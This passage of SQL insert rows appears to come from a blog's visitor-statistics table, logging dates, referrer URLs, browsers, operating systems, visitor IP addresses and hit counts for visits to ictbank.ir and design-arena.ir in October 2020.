(5581,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.135','000',0,1,0),
(5582,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.59.48.162','000',0,1,0),
(5583,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.175','000',0,1,0),
(5584,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,1,0),
(5585,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.51','000',0,1,0),
(5586,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.210.171.129','000',0,1,0),
(5587,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,1,0),
(5588,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(5589,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.125','000',0,1,0),
(5590,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.23','000',0,1,0),
(5591,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.46.52.245','000',0,1,0),
(5592,'2020-10-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.29','000',0,1,0),
(5593,'2020-10-11','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','185.100.87.191','000',0,1,0),
(5594,'2020-10-11','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.105.81.64','000',0,1,0),
(5595,'2020-10-11','www.google.com','Unknown','Android','7.0',NULL,NULL,'','52.177.121.220','000',0,2,0),
(5596,'2020-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.65.35','000',0,1,0),
(5597,'2020-10-11','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','31.171.152.139','000',0,2,0),
(5598,'2020-10-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5599,'2020-10-11','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(5600,'2020-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.135.78','000',0,1,0),
(5601,'2020-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.152.161','000',0,1,0),
(5602,'2020-10-11','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','5.129.69.11','000',0,1,0),
(5603,'2020-10-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','183.87.39.93','000',0,1,0),
(5604,'2020-10-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.234.194','000',0,1,0),
(5605,'2020-10-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(5606,'2020-10-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5607,'2020-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5608,'2020-10-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5609,'2020-10-11','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','89.220.215.4','000',0,1,0),
(5610,'2020-10-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5611,'2020-10-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(5612,'2020-10-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,7,0),
(5613,'2020-10-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,6,0),
(5614,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.232.88','000',0,1,0),
(5615,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.164.175.19','000',0,1,0),
(5616,'2020-10-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','116.202.129.130','000',0,1,0),
(5617,'2020-10-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5618,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.87.123.34','000',0,2,0),
(5619,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.28.144','000',0,1,0),
(5620,'2020-10-12','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','178.171.56.132','000',0,1,0),
(5621,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.30.46','000',0,1,0),
(5622,'2020-10-12','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','199.30.228.133','000',0,1,0),
(5623,'2020-10-12','ictbank.ir','Chrome','Windows','5.1',NULL,NULL,'','198.12.219.44','000',0,1,0),
(5624,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.230.99','000',0,1,0),
(5625,'2020-10-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(5626,'2020-10-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(5627,'2020-10-12','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','191.101.170.189','000',0,1,0),
(5628,'2020-10-12','https://www.google.com/','Edge','Windows','10.0',NULL,NULL,'','128.199.135.177','000',0,1,0),
(5629,'2020-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5630,'2020-10-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5631,'2020-10-12','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','94.101.95.240','000',0,1,0),
(5632,'2020-10-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5633,'2020-10-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,7,0),
(5634,'2020-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.216.195.194','000',0,3,0),
(5635,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.198.79','000',0,1,0),
(5636,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','115.88.11.91','000',0,1,0),
(5637,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.28.57','000',0,1,0),
(5638,'2020-10-13','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','149.202.48.45','000',0,1,0),
(5639,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.2','000',0,1,0),
(5640,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.76.139','000',0,1,0),
(5641,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.97.100.15','000',0,1,0),
(5642,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.248.107','000',0,1,0),
(5643,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(5644,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.48.11.101','000',0,1,0),
(5645,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.161.179.138','000',0,1,0),
(5646,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(5647,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.113.110.128','000',0,1,0),
(5648,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.37','000',0,1,0),
(5649,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,1,0),
(5650,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.22','000',0,1,0),
(5651,'2020-10-13','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','5.253.204.30','000',0,1,0),
(5652,'2020-10-13','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','85.10.56.136','000',0,1,0),
(5653,'2020-10-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5654,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.159.54','000',0,1,0),
(5655,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.86.106','000',0,1,0),
(5656,'2020-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5657,'2020-10-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5658,'2020-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','91.219.238.226','000',0,5,0),
(5659,'2020-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.142','000',0,2,0),
(5660,'2020-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.249','000',0,4,0),
(5661,'2020-10-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.218.54','000',0,2,0),
(5662,'2020-10-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(5663,'2020-10-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.147','000',0,1,0),
(5664,'2020-10-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.103.46.1','000',0,1,0),
(5665,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5666,'2020-10-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.132.72','000',0,3,0),
(5667,'2020-10-14','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.89.80.16','000',0,1,0),
(5668,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.195.148.18','000',0,3,0),
(5669,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.38.81.231','000',0,2,0),
(5670,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','178.17.170.178','000',0,1,0),
(5671,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.39.16.73','000',0,1,0),
(5672,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','217.182.192.217','000',0,1,0),
(5673,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','109.70.100.33','000',0,1,0),
(5674,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','176.10.99.200','000',0,1,0),
(5675,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.210.80.127','000',0,1,0),
(5676,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.129.153','000',0,1,0),
(5677,'2020-10-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(5678,'2020-10-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,9,0),
(5679,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','142.54.207.244','000',0,1,0),
(5680,'2020-10-14','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','6.1',NULL,NULL,'','85.10.56.136','000',0,2,0),
(5681,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.179.122.7','000',0,1,0),
(5682,'2020-10-14','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.4.21.234','000',0,2,0),
(5683,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.7.67','000',0,1,0),
(5684,'2020-10-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.231.94.161','000',0,2,0),
(5685,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.56.84.93','000',0,2,0),
(5686,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.110.215','000',0,1,0),
(5687,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.207.66','000',0,1,0),
(5688,'2020-10-14','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','198.46.87.115','000',0,2,0),
(5689,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','192.42.116.17','000',0,1,0),
(5690,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.12','000',0,3,0),
(5691,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.244.73.159','000',0,7,0),
(5692,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.66.130','000',0,1,0),
(5693,'2020-10-14','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','161.35.124.51','000',0,1,0),
(5694,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.140','000',0,8,0),
(5695,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.98.55.233','000',0,3,0),
(5696,'2020-10-14','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','51.15.201.113','000',0,2,0),
(5697,'2020-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(5698,'2020-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5699,'2020-10-14','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','34.70.49.158','000',0,1,0),
(5700,'2020-10-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(5701,'2020-10-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.56.109.124','000',0,1,0),
(5702,'2020-10-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.216.195.194','000',0,2,0),
(5703,'2020-10-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(5704,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','178.128.173.93','000',0,1,0),
(5705,'2020-10-15','http://82.102.9.14/blog','Chrome','Android','5.1.1',NULL,NULL,'','34.70.49.158','000',0,2,0),
(5706,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.118.230','000',0,1,0),
(5707,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.195.91.144','000',0,11,0),
(5708,'2020-10-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(5709,'2020-10-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5710,'2020-10-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5711,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','79.172.193.32','000',0,1,0),
(5712,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.251','000',0,1,0),
(5713,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.8','000',0,1,0),
(5714,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','109.70.100.52','000',0,1,0),
(5715,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.10','000',0,1,0),
(5716,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','94.230.208.147','000',0,1,0),
(5717,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.244.76.170','000',0,1,0),
(5718,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.7','000',0,1,0),
(5719,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.100.247','000',0,1,0),
(5720,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.19','000',0,1,0),
(5721,'2020-10-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','199.195.249.57','000',0,1,0),
(5722,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.178.235','000',0,1,0),
(5723,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.76','000',0,2,0),
(5724,'2020-10-15','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(5725,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.178.115','000',0,1,0),
(5726,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.85.149','000',0,1,0),
(5727,'2020-10-15','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.219.32.77','000',0,1,0),
(5728,'2020-10-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(5729,'2020-10-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5730,'2020-10-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(5731,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.99.91.214','000',0,1,0),
(5732,'2020-10-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(5733,'2020-10-16','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.243.176.191','000',0,1,0),
(5734,'2020-10-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,3,0),
(5735,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.7.41.210','000',0,2,0),
(5736,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.63.161.221','000',0,1,0),
(5737,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.106.80','000',0,1,0),
(5738,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','209.141.45.189','000',0,1,0),
(5739,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.91.8.125','000',0,5,0),
(5740,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.244.74.28','000',0,1,0),
(5741,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','46.165.245.154','000',0,1,0),
(5742,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.7','000',0,1,0),
(5743,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','109.70.100.37','000',0,1,0),
(5744,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.144','000',0,1,0),
(5745,'2020-10-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.14.158.98','000',0,2,0),
(5746,'2020-10-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(5747,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.119.217','000',0,1,0),
(5748,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.56.72','000',0,1,0),
(5749,'2020-10-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.115','000',0,1,0),
(5750,'2020-10-16','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.197.52','000',0,1,0),
(5751,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.80.214','000',0,1,0),
(5752,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.66.130','000',0,1,0),
(5753,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','91.192.103.6','000',0,5,0),
(5754,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.255.45.144','000',0,1,0),
(5755,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.240','000',0,4,0),
(5756,'2020-10-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.242','000',0,1,0),
(5757,'2020-10-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5758,'2020-10-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.185.68.118','000',0,2,0),
(5759,'2020-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5760,'2020-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5761,'2020-10-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5762,'2020-10-16','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','155.138.155.218','000',0,1,0),
(5763,'2020-10-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.246.110.17','000',0,1,0),
(5764,'2020-10-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.74','000',0,1,0),
(5765,'2020-10-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5766,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.25.247','000',0,1,0),
(5767,'2020-10-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5768,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','222.254.19.202','000',0,46,0),
(5769,'2020-10-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','120.235.126.108','000',0,1,0),
(5770,'2020-10-17','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','95.174.110.235','000',0,1,0),
(5771,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.171.251.1','000',0,1,0),
(5772,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.74.89','000',0,2,0),
(5773,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.20.61','000',0,1,0),
(5774,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','82.221.128.191','000',0,1,0),
(5775,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.12.45.118','000',0,3,0),
(5776,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.241','000',0,3,0),
(5777,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.3','000',0,1,0),
(5778,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.101.202','000',0,1,0),
(5779,'2020-10-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.195.149.142','000',0,2,0),
(5780,'2020-10-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(5781,'2020-10-17','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.122.32.203','000',0,3,0),
(5782,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.69.205','000',0,1,0),
(5783,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.227.191.225','000',0,1,0),
(5784,'2020-10-17','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','45.33.8.69','000',0,1,0),
(5785,'2020-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.183.142','000',0,1,0),
(5786,'2020-10-17','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.45','000',0,1,0),
(5787,'2020-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5788,'2020-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5789,'2020-10-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5790,'2020-10-18','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','52.30.54.19','000',0,1,0),
(5791,'2020-10-18','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','178.62.46.102','000',0,2,0),
(5792,'2020-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.41.173','000',0,1,0),
(5793,'2020-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.100.160','000',0,2,0),
(5794,'2020-10-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(5795,'2020-10-18','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.236.28.187','000',0,1,0),
(5796,'2020-10-18','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.132.83.133','000',0,1,0),
(5797,'2020-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.114.35','000',0,1,0),
(5798,'2020-10-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.207.158.59','000',0,1,0),
(5799,'2020-10-18','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.156.225.245','000',0,1,0),
(5800,'2020-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.200.9','000',0,1,0),
(5801,'2020-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.102.242','000',0,1,0),
(5802,'2020-10-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5803,'2020-10-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.222.91','000',0,1,0),
(5804,'2020-10-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5805,'2020-10-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5806,'2020-10-18','http://search.aol.com/aol/search?q=design-arena.ir&v_t=keyword_rollover&s_cs=-4851822306737969872&s_it=botm_grelsearch','Chrome','Windows','6.1',NULL,NULL,'','185.4.65.44','000',0,1,0),
(5807,'2020-10-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
